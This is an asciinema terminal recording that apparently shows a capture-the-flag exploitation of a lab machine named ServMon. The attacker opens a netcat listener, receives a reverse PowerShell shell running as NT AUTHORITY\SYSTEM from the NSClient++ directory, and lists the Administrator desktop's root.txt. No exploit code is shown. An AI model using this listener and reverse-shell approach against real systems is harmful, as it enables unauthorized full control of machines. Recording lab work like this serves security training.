{"version": 2, "width": 150, "height": 34, "timestamp": 1586757751, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.165389, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r\u001b]2;root@parrot: /home/prashant\u0007\u001b]1;/home/prashant\u0007"]
[0.166937, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mprashant\u001b[00m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[0.550004, "o", "asciinema rec"]
[0.716987, "o", "\u001b[13D./exploit.sh \b"]
[1.116133, "o", "\u001b[12Dnc -nlvp 1234"]
[1.476624, "o", "\u001b[?1l\u001b>"]
[1.476923, "o", "\u001b[?2004l\r\r\n"]
[1.477997, "o", "\u001b]2;nc -nlvp 1234\u0007\u001b]1;nc\u0007"]
[1.481456, "o", "listening on [any] 1234 ...\r\n"]
[3.56756, "o", "connect to [10.10.14.52] from (UNKNOWN) [10.10.10.184] 49701\r\n"]
[3.630315, "o", "Windows PowerShell\r\r\nCopyright (C) Microsoft Corporation. All rights reserved.\r\r\n\r\r\nTry the new cross-platform PowerShell https://aka.ms/pscore6\r\r\n\r\r\n"]
[3.966155, "o", "PS C:\\Program Files\\NSClient++> "]
[5.108546, "o", "w"]
[5.243916, "o", "h"]
[5.452064, "o", "o"]
[5.596114, "o", "a"]
[5.756107, "o", "m"]
[5.972048, "o", "i"]
[6.212192, "o", "\r\n"]
[6.525957, "o", "whoami\r\r\n"]
[6.776653, "o", "nt authority\\system\r\r\nPS C:\\Program Files\\NSClient++> "]
[7.620133, "o", "h"]
[7.884073, "o", "o"]
[8.267959, "o", "s"]
[8.476006, "o", "t"]
[8.764043, "o", "n"]
[8.883838, "o", "a"]
[9.027983, "o", "m"]
[9.163916, "o", "e"]
[9.396074, "o", "\r\n"]
[9.683095, "o", "hostname\r\r\nServMon\r\r\nPS C:\\Program Files\\NSClient++> "]
[10.547817, "o", "ls /users/Administrator/Desktop/"]
[10.900027, "o", "\r\n"]
[11.3248, "o", "ls /users/Administrator/Desktop/\r\r\n"]
[11.574851, "o", "\r\r\n\r\r\n    Directory: C:\\users\\Administrator\\Desktop\r\r\n\r\r\n\r\r\nMode                LastWriteTime         Length Name                                                                  \r\r\n----                -------------         ------ ----                                                                  \r\r\n-ar---       13/04/2020     08:43             34 root.txt                                                              \r\r\n\r\r\n\r\r\nPS C:\\Program Files\\NSClient++> "]
[13.483896, "o", "^C"]
[13.484009, "o", "\r\n"]
[13.484693, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[13.484985, "o", "\u001b]2;root@parrot: /home/prashant\u0007"]
[13.485301, "o", "\u001b]1;/home/prashant\u0007\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜ \u001b[27m \u001b[36mprashant\u001b[00m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[14.499933, "o", "\u001b[?2004l\r\r\n"]
